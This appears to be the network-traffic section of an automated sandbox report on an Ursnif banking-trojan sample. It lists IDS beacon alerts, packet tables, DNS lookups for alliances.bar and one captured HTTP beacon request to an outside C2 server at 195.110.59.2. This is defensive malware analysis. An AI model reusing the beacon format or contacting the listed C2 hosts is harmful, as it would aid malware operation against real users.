                                                        07/27/21-10:57:15.112729 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49796 | 80 | 192.168.2.3 | 162.255.119.73
                                                        07/27/21-10:57:15.319573 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49798 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:15.518934 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49799 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:15.538361 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49801 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:15.538361 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49801 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:16.026209 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49802 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:16.202506 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49803 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:16.564175 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49804 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:16.734864 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49805 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:17.087739 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49807 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:31.403365 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49808 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:31.403365 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49808 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:31.479605 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49809 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:31.479605 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49809 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:31.663827 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49811 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:31.663827 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49811 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:38.479024 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49812 | 80 | 192.168.2.3 | 162.255.119.245
                                                        07/27/21-10:57:38.870467 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49815 | 80 | 192.168.2.3 | 198.54.117.218
                                                        07/27/21-10:57:39.607612 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49818 | 80 | 192.168.2.3 | 162.255.119.245
                                                        07/27/21-10:57:40.000617 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49820 | 80 | 192.168.2.3 | 198.54.117.210

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Jul 27, 2021 10:55:44.730513096 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.731034994 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.731132984 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.732594013 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.733181000 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.750714064 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.750735044 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.751441956 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.751471043 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.751823902 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.751915932 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.751939058 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.751977921 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.752019882 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.820662975 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.821491003 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.821640968 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.835830927 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.835863113 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.837496996 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.837565899 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.837587118 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.837652922 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.838226080 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.838267088 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.838331938 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.839602947 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.853275061 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853292942 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853436947 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853451967 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853465080 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853482008 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853491068 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.853528976 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.853629112 CEST49739443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.853935003 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.854212999 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.856273890 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.856429100 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.856456041 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.856519938 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.896800041 CEST44349739172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:44.930128098 CEST49738443192.168.2.3172.67.70.134
                                                        Jul 27, 2021 10:55:44.947669029 CEST44349738172.67.70.134192.168.2.3
                                                        Jul 27, 2021 10:55:45.091253996 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.091495037 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.095921040 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.096267939 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.114537954 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.114557028 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.117512941 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.117588043 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.118999958 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.119469881 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.120054960 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.120366096 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.120381117 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.120487928 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.125957012 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.126471996 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.139303923 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.140012980 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.141925097 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.141944885 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.141962051 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.141978025 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.142141104 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.145503998 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.145526886 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.155946016 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.156027079 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.158092022 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.158576012 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.158843040 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.162412882 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.162798882 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.163085938 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163106918 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163131952 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163145065 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163162947 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163177967 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163197041 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.163212061 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.164376020 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.164376974 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.178890944 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.178915977 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.178931952 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.178950071 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.178965092 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.180388927 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.182368040 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.182499886 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.182653904 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.182781935 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.182801008 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.184343100 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.188468933 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.188494921 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.190757990 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.191349030 CEST49743443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.191999912 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.192248106 CEST49742443192.168.2.3172.67.69.19
                                                        Jul 27, 2021 10:55:45.192477942 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.192691088 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.194161892 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.194492102 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.207375050 CEST44349742172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.208106995 CEST44349743172.67.69.19192.168.2.3
                                                        Jul 27, 2021 10:55:45.219964981 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.219994068 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.220086098 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221518040 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221544981 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221574068 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221661091 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221733093 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.221859932 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.222582102 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.222583055 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.223261118 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.223484993 CEST49741443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.223587036 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.223773003 CEST49740443192.168.2.3142.250.186.70
                                                        Jul 27, 2021 10:55:45.251564026 CEST44349740142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:45.256201029 CEST44349741142.250.186.70192.168.2.3
                                                        Jul 27, 2021 10:55:50.612461090 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.612490892 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.612617016 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.612725973 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.612754107 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.613257885 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.632894993 CEST44349754151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.632927895 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.632945061 CEST44349758151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.632956028 CEST44349757151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.632972002 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.632985115 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.633714914 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.633728027 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.633735895 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.633955002 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.633960962 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.633970022 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.635046005 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.635209084 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.642234087 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.642431021 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.642483950 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.655838966 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.655858040 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.656848907 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.656872988 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.657478094 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.657505035 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.657521963 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.657531977 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.657537937 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.657581091 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.657577038 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.657869101 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.662097931 CEST44349758151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.662121058 CEST44349757151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.662130117 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663091898 CEST44349757151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663136959 CEST44349757151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663152933 CEST44349757151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663252115 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.663290977 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663310051 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663324118 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.663425922 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.663696051 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.663992882 CEST44349758151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.664017916 CEST44349758151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.664096117 CEST44349758151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.664252996 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.688143015 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.698636055 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.700570107 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.700584888 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.701375961 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.701647043 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.701702118 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703181028 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703181028 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703191042 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703205109 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703208923 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703213930 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703217983 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703361034 CEST49758443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.703598022 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.704267025 CEST49757443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.709295988 CEST44349754151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.710279942 CEST44349754151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.710300922 CEST44349754151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.710814953 CEST44349754151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.717137098 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.718970060 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.719011068 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.720254898 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.720879078 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.720899105 CEST44349756151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.720916986 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.722557068 CEST49753443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.722569942 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.722738981 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.722760916 CEST49754443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.722767115 CEST49756443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.723939896 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.723963022 CEST44349755151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.723974943 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.723989010 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724004984 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724029064 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724051952 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724075079 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724087000 CEST49755443192.168.2.3151.101.1.44
                                                        Jul 27, 2021 10:55:50.724098921 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724127054 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:55:50.724150896 CEST44349753151.101.1.44192.168.2.3
                                                        Jul 27, 2021 10:57:31.440848112 CEST4980880192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.479068995 CEST4980880192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.479604959 CEST4980980192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.516410112 CEST8049808195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.516778946 CEST8049809195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.516805887 CEST8049809195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.516932011 CEST4980980192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.618098974 CEST4980980192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.626543045 CEST4981080192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.627036095 CEST4981180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.655177116 CEST8049809195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.660039902 CEST8049810195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.660176039 CEST4981080192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.660264015 CEST8049811195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.660444975 CEST4981180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.663826942 CEST4981180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.697223902 CEST8049811195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.697251081 CEST8049811195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:31.697779894 CEST4981180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.718576908 CEST4981180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:31.753170013 CEST8049811195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.329277992 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.329365969 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.368366957 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.368398905 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.368531942 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.368720055 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.369296074 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.407707930 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.407723904 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.407860994 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.412904978 CEST4982180192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.413059950 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452241898 CEST8049821195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452270985 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452286959 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.452370882 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452593088 CEST4982280192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452940941 CEST4982380192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.452979088 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.491767883 CEST8049822195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491801977 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491820097 CEST8049823195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.491913080 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.492100000 CEST4982380192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.492652893 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.529687881 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.529720068 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:53.529782057 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.531961918 CEST4982480192.168.2.3195.110.59.2
                                                        Jul 27, 2021 10:57:53.569206953 CEST8049824195.110.59.2192.168.2.3
                                                        Jul 27, 2021 10:57:54.384248972 CEST4982380192.168.2.3195.110.59.2

                                                        UDP Packets


                                                        DNS Queries

                                                        Jul 27, 2021 10:57:39.793953896 CEST192.168.2.38.8.8.80xd4c2Standard query (0)www.alliancer.barA (IP address)IN (0x0001)
                                                        Jul 27, 2021 10:57:53.288501024 CEST192.168.2.38.8.8.80xe1a0Standard query (0)alliances.barA (IP address)IN (0x0001)

                                                        DNS Answers


                                                        HTTP Request Dependency Graph

                                                        • alliances.bar

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349775195.110.59.280
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 27, 2021 10:56:42.528923988 CEST3575OUTGET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1
                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                        Accept-Language: en-US
